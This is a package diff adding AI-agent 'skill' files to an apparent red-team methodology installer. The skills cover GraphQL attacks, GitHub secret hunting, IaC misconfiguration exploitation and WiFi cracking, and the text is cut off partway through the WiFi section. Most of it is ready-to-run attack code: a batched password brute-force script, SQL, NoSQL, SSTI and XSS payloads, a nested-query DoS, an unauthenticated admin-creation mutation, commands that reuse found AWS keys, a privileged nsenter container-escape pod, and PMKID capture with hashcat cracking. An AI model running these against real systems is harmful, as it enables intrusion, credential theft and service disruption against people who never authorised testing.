rtexit-method 0.1.15 → 0.1.17

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "rtexit-method",
-  "version": "0.1.15",
+  "version": "0.1.17",
   "description": "RTExit - AI-assisted Red Team methodology installer",
   "license": "MIT",
   "author": "Exit Code",

package/packaged-assets/.agents/skills/rt-exploit-graphql/SKILL.md

@@ -0,0 +1,311 @@
+---
+name: rt-exploit-graphql
+description: "GraphQL-specific attack techniques — introspection enumeration, field suggestions bypass, batching attacks (rate limit bypass), nested query DoS, IDOR via GraphQL, injection through arguments, authorization bypass, persisted query exploitation, subscription hijacking. Dedicated skill beyond generic API testing. Tools: graphql-cop, InQL, graphw00f, Burp Suite extensions. Docker: rtexit/kali:v3.0."
+---
+
+> 🐳 **Docker Environment (Recommended):** `docker exec -it rtexit-kali bash`
+
+# rt-exploit-graphql — GraphQL Security Testing
+
+## Overview
+
+GraphQL APIs expose a completely different attack surface from REST. A single endpoint handles all operations, introspection reveals the entire schema, and batch queries can bypass rate limiting. Most developers underestimate GraphQL security.
+
+**When to use:**
+- Target has GraphQL endpoint (`/graphql`, `/api/graphql`, `/v1/graphql`)
+- Testing a modern web/mobile app with complex data requirements
+- After discovering GraphQL via JS analysis or network traffic
+
+---
+
+## Phase 1: Identify GraphQL Endpoints
+
+```bash
+docker exec rtexit-kali bash -c "
+TARGET=https://target.com
+
+# Common GraphQL paths
+for path in /graphql /api/graphql /graphiql /playground /v1/graphql /v2/graphql /query /gql; do
+  STATUS=\$(curl -sk -o /dev/null -w '%{http_code}' \"\${TARGET}\${path}\")
+  if [ \$STATUS != '404' ]; then
+    echo \"[\$STATUS] \${TARGET}\${path}\"
+  fi
+done
+
+# JavaScript analysis — find GraphQL in frontend code
+docker exec rtexit-kali bash -c \"
+  curl -sk \$TARGET | grep -oE '/[a-z/_-]*graphql[a-z/_-]*' | sort -u
+  curl -sk \$TARGET | grep -oE 'graphqlUrl|graphqlEndpoint|gqlUrl' | head -10
+\"
+"
+```
+
+---
+
+## Phase 2: Introspection — Schema Discovery
+
+```bash
+docker exec rtexit-kali bash -c "
+TARGET=https://target.com/graphql
+
+# Full introspection query
+curl -sk \$TARGET \
+  -H 'Content-Type: application/json' \
+  -d '{\"query\":\"{__schema{types{name,fields{name,type{name,kind,ofType{name,kind}},args{name,type{name,kind,ofType{name,kind}},defaultValue}}}}}\"}' \
+  | python3 -m json.tool | head -100
+
+# Get all query/mutation names
+curl -sk \$TARGET \
+  -H 'Content-Type: application/json' \
+  -d '{\"query\":\"{__schema{queryType{fields{name,description}},mutationType{fields{name,description}}}}\"}' \
+  | python3 -c \"
+import json,sys
+r = json.load(sys.stdin)
+schema = r.get('data',{}).get('__schema',{})
+print('=== QUERIES ===')
+for f in schema.get('queryType',{}).get('fields',[]):
+    print(f'  {f[\\\"name\\\"]}: {f.get(\\\"description\\\",\\\"\\\")[:60]}')
+print('=== MUTATIONS ===')
+for f in schema.get('mutationType',{}).get('fields',[]):
+    print(f'  {f[\\\"name\\\"]}: {f.get(\\\"description\\\",\\\"\\\")[:60]}')
+\"
+"
+```
+
+---
+
+## Phase 3: graphql-cop — Automated Security Audit
+
+```bash
+docker exec rtexit-kali bash -c "
+# graphql-cop covers: introspection, DoS, injection, CSRF, debug
+python3 /opt/graphql-cop/graphql-cop.py \
+  -t https://target.com/graphql \
+  -o /tmp/graphql_audit.json 2>/dev/null || \
+graphql-cop -t https://target.com/graphql 2>/dev/null
+
+# Parse results
+cat /tmp/graphql_audit.json | python3 -c \"
+import json,sys
+for vuln in json.load(sys.stdin):
+    if vuln.get('result'):
+        print(f'[VULN] {vuln[\\\"title\\\"]} ({vuln[\\\"severity\\\"]})')
+        print(f'  {vuln[\\\"description\\\"]}')
+\"
+"
+```
+
+---
+
+## Phase 4: InQL — Deep Schema Analysis + Attack
+
+```bash
+docker exec rtexit-kali bash -c "
+TARGET=https://target.com/graphql
+
+# Scan with InQL
+inql -t \$TARGET -o /tmp/inql_output/
+
+# Generated files:
+ls /tmp/inql_output/
+# *.query — sample queries for every type
+# *.mutation — sample mutations
+# report.html — visual schema map
+
+# Use generated queries as testing baseline
+cat /tmp/inql_output/*.query | head -50
+"
+```
+
+---
+
+## Phase 5: Disable Introspection Bypass
+
+```bash
+docker exec rtexit-kali bash -c "
+TARGET=https://target.com/graphql
+
+# If introspection is disabled, use field suggestions
+# GraphQL engines leak type names through suggestions
+
+# Test suggestion bypass
+curl -sk \$TARGET \
+  -H 'Content-Type: application/json' \
+  -d '{\"query\":\"{user{id,emali}}\"}' \
+  | grep -i 'did you mean\|suggestion'
+# Output: 'Did you mean \"email\"?' → field exists!
+
+# Systematic field enumeration via suggestions
+docker exec rtexit-kali bash -c \"
+for field in id email password token role admin secret hash salt; do
+  result=\\\$(curl -sk https://target.com/graphql \\\\
+    -H 'Content-Type: application/json' \\\\
+    -d '{\\\"query\\\":\\\"{user{'\\\$field'}}\\\"}' \\\\
+    | grep -i 'did you mean\|Cannot query field')
+  echo \\\"\\\$field: \\\$result\\\"
+done
+\"
+"
+```
+
+---
+
+## Phase 6: Batching Attack — Bypass Rate Limiting
+
+```bash
+docker exec rtexit-kali bash -c "
+TARGET=https://target.com/graphql
+
+# Array batching — send 1000 queries in single HTTP request
+# Bypasses rate limiting that counts HTTP requests, not GraphQL operations
+
+python3 - << 'EOF'
+import json, requests
+
+target = 'https://target.com/graphql'
+# Batch 1000 login attempts in ONE request
+batch = [
+    {'query': 'mutation { login(email: \"admin@target.com\", password: \"' + pwd + '\") { token } }'}
+    for pwd in open('/opt/SecLists/Passwords/top1000.txt').read().splitlines()[:1000]
+]
+
+resp = requests.post(target, json=batch, 
+    headers={'Content-Type': 'application/json'}, 
+    verify=False, timeout=30)
+
+for i, result in enumerate(resp.json()):
+    if result.get('data', {}).get('login', {}).get('token'):
+        print(f'[+] FOUND! Password: {batch[i]}')
+        break
+EOF
+"
+```
+
+---
+
+## Phase 7: IDOR & Authorization Bypass
+
+```bash
+docker exec rtexit-kali bash -c "
+TARGET=https://target.com/graphql
+AUTH_TOKEN=eyJhbGciOiJIUzI1NiJ9... # your session token
+
+# Test IDOR — change ID to access other users' data
+for id in 1 2 3 100 999 1000; do
+  result=\$(curl -sk \$TARGET \
+    -H 'Content-Type: application/json' \
+    -H \"Authorization: Bearer \$AUTH_TOKEN\" \
+    -d \"{\\\"query\\\": \\\"{user(id: \$id){ id email phone role }}\\\"}\" \
+    | python3 -c 'import json,sys; u=json.load(sys.stdin).get(\"data\",{}).get(\"user\",{}); print(u) if u else None')
+  echo \"User \$id: \$result\"
+done
+
+# Test missing authorization on mutations
+curl -sk \$TARGET \
+  -H 'Content-Type: application/json' \
+  -H 'Authorization: Bearer LOW_PRIV_TOKEN' \
+  -d '{ \"query\": \"mutation { deleteUser(id: 1) { success } }\" }'
+
+# Test for admin mutations without auth
+curl -sk \$TARGET \
+  -H 'Content-Type: application/json' \
+  -d '{ \"query\": \"mutation { createAdmin(email: \"attacker@evil.com\", password: \"pass\") { id token } }\" }'
+"
+```
+
+---
+
+## Phase 8: Injection via GraphQL Arguments
+
+```bash
+docker exec rtexit-kali bash -c "
+TARGET=https://target.com/graphql
+
+# SQL injection through arguments
+curl -sk \$TARGET \
+  -H 'Content-Type: application/json' \
+  -d '{ \"query\": \"{ users(filter: \\\"1 OR 1=1--\\\") { id email password } }\" }'
+
+# NoSQL injection (MongoDB)
+curl -sk \$TARGET \
+  -H 'Content-Type: application/json' \
+  -d '{ \"query\": \"{ user(id: \\\"{\\\\\"\\\\$gt\\\\\": \\\"\\\"}\\\") { email password } }\" }'
+
+# SSTI in arguments
+curl -sk \$TARGET \
+  -H 'Content-Type: application/json' \
+  -d '{ \"query\": \"{ search(query: \\\"{{7*7}}\\\") { results } }\" }'
+# If response contains 49 → SSTI
+
+# XSS stored via GraphQL mutation
+curl -sk \$TARGET \
+  -H 'Content-Type: application/json' \
+  -d '{ \"query\": \"mutation { updateProfile(bio: \\\"<script>alert(1)</script>\\\") { id } }\" }'
+"
+```
+
+---
+
+## Phase 9: Nested Query DoS (Depth Attack)
+
+```bash
+docker exec rtexit-kali bash -c "
+TARGET=https://target.com/graphql
+
+# Generate deeply nested query — can crash servers without depth limiting
+python3 - << 'EOF'
+import requests
+
+depth = 50
+query = '{ user { ' + 'friends { ' * depth + 'id name' + '}' * depth + '} }'
+
+resp = requests.post('https://target.com/graphql',
+    json={'query': query},
+    headers={'Content-Type': 'application/json'},
+    verify=False, timeout=10)
+
+print(f'Status: {resp.status_code}')
+print(f'Response size: {len(resp.content)} bytes')
+print(resp.json())
+EOF
+"
+```
+
+---
+
+## Phase 10: Persisted Query Exploitation
+
+```bash
+docker exec rtexit-kali bash -c "
+TARGET=https://target.com/graphql
+
+# Find persisted query IDs
+curl -sk \$TARGET \
+  -H 'Content-Type: application/json' \
+  -d '{ \"extensions\": { \"persistedQuery\": { \"version\": 1, \"sha256Hash\": \"KNOWN_HASH\" } } }'
+
+# Abuse persisted queries to access admin functions
+# If server stores queries by hash — inject your own
+MALICIOUS_QUERY='{ users { id email password role } }'
+HASH=\$(echo -n \"\$MALICIOUS_QUERY\" | sha256sum | awk '{print \$1}')
+
+# Register and execute
+curl -sk \$TARGET \
+  -H 'Content-Type: application/json' \
+  -d \"{\\\"query\\\": \\\"\$MALICIOUS_QUERY\\\", \\\"extensions\\\": {\\\"persistedQuery\\\": {\\\"version\\\": 1, \\\"sha256Hash\\\": \\\"\$HASH\\\"}}}\"
+"
+```
+
+---
+
+## Related Skills
+- `rt-exploit-api` — REST API testing methodology
+- `rt-exploit-injection` — injection via GraphQL arguments
+- `rt-exploit-idor` — IDOR through GraphQL object access
+- `rt-js-analysis` — find GraphQL schema from JS bundles
+
+## References
+- https://github.com/dolevf/graphql-cop
+- https://github.com/nicowillis/inql
+- https://attack.mitre.org/techniques/T1190/ — Exploit Public-Facing Application
+- https://graphql.org/learn/introspection/

package/packaged-assets/.agents/skills/rt-github-recon/SKILL.md

@@ -0,0 +1,251 @@
+---
+name: rt-github-recon
+description: "GitHub/GitLab/Bitbucket reconnaissance and secret exposure — find leaked API keys, tokens, passwords, internal hostnames, source code from exposed repos. Covers: org enumeration, trufflehog scanning, gitleaks, exposed .git directories (git-dumper), GitHub dorks, GitLab self-hosted enumeration, CI/CD secrets in pipelines. Critical recon step for any org with a GitHub presence. Docker: rtexit/kali:v3.0."
+---
+
+> 🐳 **Docker Environment (Recommended):** `docker exec -it rtexit-kali bash`
+
+# rt-github-recon — Source Code & Secret Exposure via Git Platforms
+
+## Overview
+
+GitHub is a goldmine. Organizations accidentally commit API keys, internal hostnames, credentials, infrastructure code, and proprietary algorithms. Even "private" repos often have leaked secrets that were committed before being removed — git history never forgets.
+
+**When to use:**
+- Phase 1 Recon against any target with a developer team
+- Before web/API testing — find endpoints and keys in source
+- Before cloud testing — find AWS/Azure credentials
+- Find internal infrastructure details (server names, IPs, CI/CD configs)
+
+---
+
+## Phase 1: Organization Discovery
+
+```bash
+docker exec rtexit-kali bash -c "
+TARGET_ORG=target-company
+
+# Find GitHub org
+curl -s 'https://api.github.com/search/users?q=type:org+${TARGET_ORG}' \
+  -H 'Authorization: token YOUR_GITHUB_TOKEN' | python3 -m json.tool
+
+# List all public repos in org
+curl -s 'https://api.github.com/orgs/${TARGET_ORG}/repos?per_page=100&type=all' \
+  -H 'Authorization: token YOUR_GITHUB_TOKEN' | \
+  python3 -c 'import json,sys; [print(r[\"clone_url\"]) for r in json.load(sys.stdin)]'
+
+# Find employees by org membership
+curl -s 'https://api.github.com/orgs/${TARGET_ORG}/members?per_page=100' \
+  -H 'Authorization: token YOUR_GITHUB_TOKEN' | \
+  python3 -c 'import json,sys; [print(m[\"login\"]) for m in json.load(sys.stdin)]'
+"
+```
+
+---
+
+## Phase 2: GitHub Dorks — Find Exposed Secrets
+
+```bash
+docker exec rtexit-kali bash -c "
+# Search for secrets using GitHub code search API
+TOKEN=YOUR_GITHUB_TOKEN
+ORG=target-company
+
+# Common dorks (search one at a time — rate limits)
+dorks=(
+  'org:${ORG} password'
+  'org:${ORG} secret'
+  'org:${ORG} api_key'
+  'org:${ORG} AWS_SECRET_ACCESS_KEY'
+  'org:${ORG} BEGIN RSA PRIVATE KEY'
+  'org:${ORG} .env'
+  'org:${ORG} database_url'
+  'org:${ORG} jdbc:mysql'
+  'org:${ORG} mongodb+srv'
+  'org:${ORG} Authorization: Bearer'
+  'org:${ORG} slack_token'
+  'org:${ORG} PRIVATE KEY'
+  'org:${ORG} internal.company.com'
+)
+
+for dork in \"\${dorks[@]}\"; do
+  echo \"=== Dork: \$dork ===\"
+  curl -s \"https://api.github.com/search/code?q=\$(python3 -c 'import urllib.parse,sys; print(urllib.parse.quote(sys.argv[1]))' \"\$dork\")&per_page=10\" \
+    -H \"Authorization: token \$TOKEN\" | python3 -c \"
+import json,sys
+r = json.load(sys.stdin)
+for item in r.get('items', []):
+    print(' ', item['repository']['full_name'], '→', item['path'])
+\"
+  sleep 2  # respect rate limits
+done
+"
+```
+
+---
+
+## Phase 3: trufflehog — Deep Secret Scan
+
+```bash
+docker exec rtexit-kali bash -c "
+ORG=target-company
+
+# Scan all public repos in org
+trufflehog github --org=\$ORG \
+  --token=YOUR_GITHUB_TOKEN \
+  --json \
+  --only-verified \
+  2>/dev/null | tee /tmp/trufflehog_results.json
+
+# Parse results
+cat /tmp/trufflehog_results.json | python3 -c \"
+import json, sys
+for line in sys.stdin:
+    try:
+        r = json.loads(line)
+        print(f'[SECRET] {r.get(\"DetectorName\")}: {r.get(\"Raw\", \"\")[:50]}')
+        print(f'  Repo: {r.get(\"SourceMetadata\", {}).get(\"Data\", {}).get(\"Github\", {}).get(\"repository\")}')
+        print(f'  File: {r.get(\"SourceMetadata\", {}).get(\"Data\", {}).get(\"Github\", {}).get(\"file\")}')
+    except: pass
+\"
+
+# Also scan specific repo including git history
+trufflehog git https://github.com/\$ORG/target-repo \
+  --token=YOUR_GITHUB_TOKEN \
+  --json \
+  --only-verified 2>/dev/null
+"
+```
+
+---
+
+## Phase 4: gitleaks — Scan Cloned Repos
+
+```bash
+docker exec rtexit-kali bash -c "
+ORG=target-company
+mkdir -p /tmp/repos
+
+# Clone all repos
+for repo in \$(curl -s 'https://api.github.com/orgs/'\$ORG'/repos?per_page=100' \
+  -H 'Authorization: token YOUR_GITHUB_TOKEN' | \
+  python3 -c 'import json,sys; [print(r[\"clone_url\"]) for r in json.load(sys.stdin)]'); do
+  git clone --depth 100 \$repo /tmp/repos/\$(basename \$repo .git) 2>/dev/null
+done
+
+# Scan all with gitleaks
+gitleaks detect \
+  --source /tmp/repos/ \
+  --report-path /tmp/gitleaks_report.json \
+  --report-format json \
+  --no-banner \
+  2>/dev/null
+
+# Parse
+cat /tmp/gitleaks_report.json | python3 -m json.tool | \
+  grep -A5 'RuleID\|Secret\|File\|Commit'
+"
+```
+
+---
+
+## Phase 5: Exposed .git Directories on Web Servers
+
+```bash
+docker exec rtexit-kali bash -c "
+TARGET=https://target.com
+
+# Check if .git is exposed
+curl -s \${TARGET}/.git/HEAD | grep -i 'ref:'
+curl -s \${TARGET}/.git/config
+
+# If exposed — dump entire repository
+git-dumper \${TARGET}/.git /tmp/git_dump/
+ls /tmp/git_dump/
+
+# Find secrets in dumped code
+grep -r 'password\|secret\|api_key\|token\|AKIA' /tmp/git_dump/ --include='*.py' --include='*.js' --include='*.env' --include='*.yml'
+"
+```
+
+---
+
+## Phase 6: GitLab Self-Hosted Enumeration
+
+```bash
+docker exec rtexit-kali bash -c "
+GITLAB_URL=https://gitlab.internal.company.com
+
+# Check GitLab version (unauthenticated)
+curl -s \${GITLAB_URL}/api/v4/version 2>/dev/null | python3 -m json.tool
+
+# Enumerate public projects (no auth needed)
+curl -s '\${GITLAB_URL}/api/v4/projects?visibility=public&per_page=100' | \
+  python3 -c 'import json,sys; [print(p[\"web_url\"]) for p in json.load(sys.stdin)]'
+
+# With auth token
+curl -s '\${GITLAB_URL}/api/v4/projects?per_page=100&membership=true' \
+  -H 'PRIVATE-TOKEN: GITLAB_TOKEN' | \
+  python3 -c 'import json,sys; [print(p[\"http_url_to_repo\"]) for p in json.load(sys.stdin)]'
+
+# Find CI/CD variables (often has cloud credentials)
+curl -s '\${GITLAB_URL}/api/v4/groups/TARGET_GROUP/variables' \
+  -H 'PRIVATE-TOKEN: GITLAB_TOKEN'
+"
+```
+
+---
+
+## Phase 7: CI/CD Pipeline Secret Hunting
+
+```bash
+docker exec rtexit-kali bash -c "
+# Find GitHub Actions workflows with secrets
+ORG=target-company
+
+# List all workflow files
+curl -s 'https://api.github.com/search/code?q=org:'\$ORG'+filename:.yml+path:.github/workflows' \
+  -H 'Authorization: token YOUR_GITHUB_TOKEN' | \
+  python3 -c \"
+import json,sys
+for item in json.load(sys.stdin).get('items', []):
+    print(item['repository']['full_name'], '->', item['path'])
+\"
+
+# Look for hardcoded secrets in workflow files
+# Common patterns: curl with Bearer, aws configure, secrets leak
+"
+```
+
+---
+
+## Phase 8: Find Internal Hostnames & Infrastructure
+
+```bash
+docker exec rtexit-kali bash -c "
+ORG=target-company
+
+# Search for internal hostnames in code
+for pattern in 'internal\.' 'corp\.' 'staging\.' 'dev\.' '10\.0\.' '192\.168\.'; do
+  echo \"=== Searching: \$pattern ===\"
+  curl -s \"https://api.github.com/search/code?q=org:\${ORG}+\$(python3 -c 'import urllib.parse,sys; print(urllib.parse.quote(sys.argv[1]))' \"\$pattern\")&per_page=5\" \
+    -H 'Authorization: token YOUR_GITHUB_TOKEN' | \
+    python3 -c \"import json,sys; r=json.load(sys.stdin); [print('  ', i['repository']['full_name'], '->', i['path']) for i in r.get('items',[])]\"
+  sleep 2
+done
+"
+```
+
+---
+
+## Related Skills
+- `rt-osint` — broader OSINT methodology
+- `rt-active-recon` — follow up with active scanning on found infrastructure
+- `rt-credential-hunt` — use found credentials to access systems
+- `rt-supply-chain` — use found code to analyze dependencies
+
+## References
+- https://github.com/trufflesecurity/trufflehog
+- https://github.com/gitleaks/gitleaks
+- https://github.com/arthaud/git-dumper
+- https://attack.mitre.org/techniques/T1213/ — Data from Information Repositories

package/packaged-assets/.agents/skills/rt-iac-misconfig/SKILL.md

@@ -0,0 +1,250 @@
+---
+name: rt-iac-misconfig
+description: "Infrastructure-as-Code (IaC) misconfiguration testing — Terraform, Kubernetes YAML, CloudFormation, Helm, Ansible, Docker Compose. Find hardcoded secrets, overprivileged IAM roles, public buckets, unencrypted storage, insecure network policies. Tools: checkov, tfsec, trivy, kube-score, semgrep. Critical for cloud and DevSecOps engagements. Docker: rtexit/kali:v3.0."
+---
+
+> 🐳 **Docker Environment (Recommended):** `docker exec -it rtexit-kali bash`
+
+# rt-iac-misconfig — Infrastructure-as-Code Security Testing
+
+## Overview
+
+Modern infrastructure is defined as code — and that code has security vulnerabilities. IaC misconfigurations cause the majority of cloud breaches: publicly accessible S3 buckets, overprivileged IAM roles, and unencrypted databases are all defined in code before they become breaches.
+
+**When to use:**
+- Cloud engagement with access to IaC repositories
+- DevSecOps assessment
+- After gaining code repository access (GitHub recon → IaC files)
+- Before testing cloud resources — understand how they're configured
+
+---
+
+## Phase 1: Find IaC Files in Target Repos
+
+```bash
+docker exec rtexit-kali bash -c "
+# Search GitHub for IaC files
+ORG=target-company
+TOKEN=YOUR_GITHUB_TOKEN
+
+# Terraform files
+curl -s 'https://api.github.com/search/code?q=org:'\$ORG'+extension:tf+provider' \
+  -H 'Authorization: token '\$TOKEN | \
+  python3 -c 'import json,sys; [print(i[\"repository\"][\"full_name\"], i[\"path\"]) for i in json.load(sys.stdin).get(\"items\",[])]'
+
+# CloudFormation
+curl -s 'https://api.github.com/search/code?q=org:'\$ORG'+AWSTemplateFormatVersion' \
+  -H 'Authorization: token '\$TOKEN | \
+  python3 -c 'import json,sys; [print(i[\"repository\"][\"full_name\"], i[\"path\"]) for i in json.load(sys.stdin).get(\"items\",[])]'
+
+# K8s manifests
+curl -s 'https://api.github.com/search/code?q=org:'\$ORG'+apiVersion+kind:+Deployment+path:k8s' \
+  -H 'Authorization: token '\$TOKEN | \
+  python3 -c 'import json,sys; [print(i[\"repository\"][\"full_name\"], i[\"path\"]) for i in json.load(sys.stdin).get(\"items\",[])]'
+"
+```
+
+---
+
+## Phase 2: checkov — Comprehensive IaC Scanner
+
+```bash
+docker exec rtexit-kali bash -c "
+# Clone target IaC repo
+git clone https://github.com/target/infrastructure /tmp/infra/
+
+# Scan Terraform
+checkov -d /tmp/infra/terraform/ \
+  --framework terraform \
+  --output cli \
+  --compact \
+  2>/dev/null
+
+# Scan Kubernetes manifests
+checkov -d /tmp/infra/k8s/ \
+  --framework kubernetes \
+  --output json > /tmp/k8s_findings.json
+
+# Scan CloudFormation
+checkov -d /tmp/infra/cloudformation/ \
+  --framework cloudformation \
+  --output cli
+
+# Scan everything
+checkov -d /tmp/infra/ --output json > /tmp/checkov_all.json
+
+# Extract HIGH severity findings
+cat /tmp/checkov_all.json | python3 -c \"
+import json, sys
+r = json.load(sys.stdin)
+for result in r.get('results', {}).get('failed_checks', []):
+    print(f'[FAIL] {result[\\\"check_id\\\"]}: {result[\\\"check\\\"][\\\"name\\\"]}')
+    print(f'  File: {result[\\\"repo_file_path\\\"]}:{result[\\\"file_line_range\\\"]}')
+\"
+"
+```
+
+---
+
+## Phase 3: Hardcoded Secrets in IaC
+
+```bash
+docker exec rtexit-kali bash -c "
+IaC_DIR=/tmp/infra
+
+# gitleaks on IaC repo
+gitleaks detect --source \$IaC_DIR --no-banner --report-format json \
+  --report-path /tmp/iac_secrets.json 2>/dev/null
+
+# trufflehog on cloned repo
+trufflehog git file://\${IaC_DIR} --json 2>/dev/null | head -50
+
+# Manual grep patterns
+echo '=== AWS Keys in IaC ==='
+grep -r 'AKIA[0-9A-Z]\{16\}' \$IaC_DIR --include='*.tf' --include='*.yaml' --include='*.yml' --include='*.json'
+
+echo '=== Hardcoded passwords ==='
+grep -rE '(password|secret|token)\s*=\s*\"[^\"]{6,}\"' \$IaC_DIR \
+  --include='*.tf' --include='*.yaml' --include='*.yml'
+
+echo '=== Database connection strings ==='
+grep -rE 'jdbc:|mongodb\+srv:|postgresql://|mysql://' \$IaC_DIR \
+  --include='*.tf' --include='*.yaml' --include='*.yml' --include='*.env'
+
+echo '=== Private keys ==='
+grep -r 'BEGIN.*PRIVATE KEY\|BEGIN RSA\|BEGIN EC' \$IaC_DIR -l
+"
+```
+
+---
+
+## Phase 4: Terraform — IAM & Security Issues
+
+```bash
+docker exec rtexit-kali bash -c "
+IaC_DIR=/tmp/infra/terraform
+
+echo '=== Overprivileged IAM policies ==='
+grep -r '\"*\"\|Action.*\*\|Resource.*\*' \$IaC_DIR --include='*.tf' -A2
+
+echo '=== Public S3 buckets ==='
+grep -r 'acl.*=.*\"public\|block_public_acls.*false\|ignore_public_acls.*false' \$IaC_DIR --include='*.tf' -B2
+
+echo '=== Unencrypted storage ==='
+grep -r 'encrypted.*=.*false\|encryption.*=.*\"none\"' \$IaC_DIR --include='*.tf' -B2
+
+echo '=== Security groups wide open ==='
+grep -r 'cidr_blocks.*0\.0\.0\.0/0\|ipv6_cidr.*::/0' \$IaC_DIR --include='*.tf' -B5
+
+echo '=== S3 versioning disabled ==='
+grep -r 'versioning' \$IaC_DIR --include='*.tf' -A3 | grep -v 'enabled.*true'
+
+echo '=== CloudTrail disabled ==='
+grep -r 'enable_logging.*false\|is_multi_region_trail.*false' \$IaC_DIR --include='*.tf' -B2
+"
+```
+
+---
+
+## Phase 5: Kubernetes — RBAC & Pod Security
+
+```bash
+docker exec rtexit-kali bash -c "
+K8S_DIR=/tmp/infra/k8s
+
+echo '=== Privileged containers ==='
+grep -r 'privileged: true' \$K8S_DIR --include='*.yaml' --include='*.yml' -B5
+
+echo '=== hostNetwork / hostPID / hostIPC ==='
+grep -r 'hostNetwork: true\|hostPID: true\|hostIPC: true' \$K8S_DIR --include='*.yaml' -B5
+
+echo '=== runAsRoot ==='
+grep -r 'runAsUser: 0\|runAsNonRoot: false' \$K8S_DIR --include='*.yaml' -B5
+
+echo '=== AllowPrivilegeEscalation ==='
+grep -r 'allowPrivilegeEscalation: true' \$K8S_DIR --include='*.yaml' -B5
+
+echo '=== Hardcoded secrets in env vars ==='
+grep -rE 'value: \"[A-Za-z0-9+/]{20,}\"' \$K8S_DIR --include='*.yaml' -B3
+
+echo '=== RBAC * permissions ==='
+grep -r 'verbs:.*\\\"\*\\\"\\|resources:.*\\\"\*\\\"' \$K8S_DIR --include='*.yaml' -B5
+
+echo '=== Exposed NodePort/LoadBalancer ==='
+grep -r 'type: NodePort\|type: LoadBalancer' \$K8S_DIR --include='*.yaml' -B10 | grep -E 'name:|type:|port:'
+"
+```
+
+---
+
+## Phase 6: trivy — IaC + Container Vulnerability Scan
+
+```bash
+docker exec rtexit-kali bash -c "
+# Scan IaC directory
+trivy config /tmp/infra/ \
+  --format table \
+  --exit-code 0 \
+  --severity HIGH,CRITICAL
+
+# Scan Dockerfile
+trivy config /tmp/infra/Dockerfile
+
+# Scan Helm chart
+trivy config /tmp/infra/helm/
+
+# Scan K8s manifests
+trivy k8s --report summary /tmp/infra/k8s/
+"
+```
+
+---
+
+## Phase 7: Exploit Found Misconfigs
+
+```bash
+docker exec rtexit-kali bash -c "
+# Example: Found public S3 bucket in Terraform
+# → check if bucket is actually public
+s3scanner scan --bucket target-company-backups
+
+# Found AWS credentials in .tf file
+# → use them
+aws configure set aws_access_key_id FOUND_KEY
+aws configure set aws_secret_access_key FOUND_SECRET
+aws sts get-caller-identity
+aws iam list-attached-user-policies --user-name \$(aws iam get-user | python3 -c 'import json,sys; print(json.load(sys.stdin)[\"User\"][\"UserName\"])')
+
+# Found K8s config with privileged pod
+# → deploy escape pod
+kubectl apply -f - << 'EOF'
+apiVersion: v1
+kind: Pod
+metadata:
+  name: escape
+spec:
+  hostPID: true
+  hostNetwork: true
+  containers:
+  - name: escape
+    image: alpine
+    command: ['nsenter', '--target', '1', '--mount', '--uts', '--ipc', '--net', '--pid', '--', 'bash']
+    securityContext:
+      privileged: true
+EOF
+"
+```
+
+---
+
+## Related Skills
+- `rt-exploit-cloud-aws` — exploit found AWS misconfigs
+- `rt-kubernetes` — exploit K8s RBAC issues
+- `rt-github-recon` — find IaC repos first
+- `rt-supply-chain` — IaC pipeline security
+- `rt-exploit-containers` — container escape after finding privileged pods
+
+## References
+- https://www.checkov.io/
+- https://aquasecurity.github.io/trivy/
+- https://attack.mitre.org/techniques/T1580/ — Cloud Infrastructure Discovery

package/packaged-assets/.agents/skills/rt-wifi-attacks/SKILL.md

@@ -0,0 +1,273 @@
+---
+name: rt-wifi-attacks
+description: "Advanced WiFi penetration testing — WPA2 PMKID capture (clientless), Evil Twin / WPA Enterprise downgrade (hostapd-wpe), KRACK attack, WPS brute force, deauth attacks, rogue AP with credential capture, enterprise 802.1X PEAP downgrade. Tools: wifite2, aircrack-ng, hcxdumptool, hcxtools, hostapd-wpe, bettercap. For physical red team engagements requiring wireless access."
+---
+
+> 🐳 **Docker Environment (Recommended):** `docker exec -it rtexit-kali bash`
+> ⚠️ **Requires:** WiFi adapter with monitor mode (e.g., Alfa AWUS036ACH) passed to Docker via `--device` or USB passthrough
+
+# rt-wifi-attacks — Professional WiFi Penetration Testing
+
+## Overview
+
+WiFi attacks remain highly effective for physical red team engagements — bypass perimeter security by capturing credentials on the parking lot, or setup a rogue AP at client offices to capture enterprise creds.
+
+**When to use:**
+- Physical red team engagement requiring network access
+- Testing wireless security of corporate WiFi
+- Demonstrating WPA2-Enterprise credential theft
+- Testing guest WiFi isolation
+
+---
+
+## Setup — WiFi Adapter in Docker
+
+```bash
+# Check available WiFi interfaces on host
+ip link show | grep wlan
+iwconfig
+
+# Pass adapter to Docker
+docker run -it --privileged \
+  --net=host \
+  --device=/dev/bus/usb \
+  rtexit/kali:v3.0
+
+# Or with specific interface
+docker exec rtexit-kali bash -c "
+  airmon-ng start wlan0
+  iwconfig wlan0mon
+"
+```
+
+---
+
+## Phase 1: Survey & Reconnaissance
+
+```bash
+docker exec rtexit-kali bash -c "
+# Enable monitor mode
+airmon-ng check kill
+airmon-ng start wlan0
+
+# Scan all networks
+airodump-ng wlan0mon
+
+# Capture specific BSSID (2.4GHz + 5GHz)
+airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /tmp/capture wlan0mon
+
+# Also use bettercap for passive scan
+bettercap -iface wlan0mon -eval 'wifi.recon on; sleep 30; wifi.show'
+"
+```
+
+---
+
+## Phase 2: WPA2 PMKID Attack (No Clients Needed)
+
+```bash
+docker exec rtexit-kali bash -c "
+# PMKID attack — capture handshake without deauth, no clients needed
+# Step 1: Capture PMKID with hcxdumptool
+hcxdumptool -i wlan0mon \
+  --enable_status=1 \
+  -o /tmp/pmkid_capture.pcapng \
+  --filtermode=2 \
+  --filterlist_ap=/tmp/target_bssids.txt &
+sleep 60
+kill %1
+
+# Step 2: Convert to hashcat format
+hcxpcapngtool -o /tmp/pmkid.hash /tmp/pmkid_capture.pcapng
+
+# Step 3: Crack with hashcat (mode 22000 = WPA2)
+hashcat -a 0 -m 22000 /tmp/pmkid.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt \
+  --force --status
+
+# Step 4: Rule-based attack
+hashcat -a 0 -m 22000 /tmp/pmkid.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt \
+  -r /opt/hashcat/rules/best64.rule --force
+"
+```
+
+---
+
+## Phase 3: WPA2 4-Way Handshake (Traditional)
+
+```bash
+docker exec rtexit-kali bash -c "
+TARGET_BSSID=AA:BB:CC:DD:EE:FF
+TARGET_CHANNEL=6
+
+# Step 1: Start capture
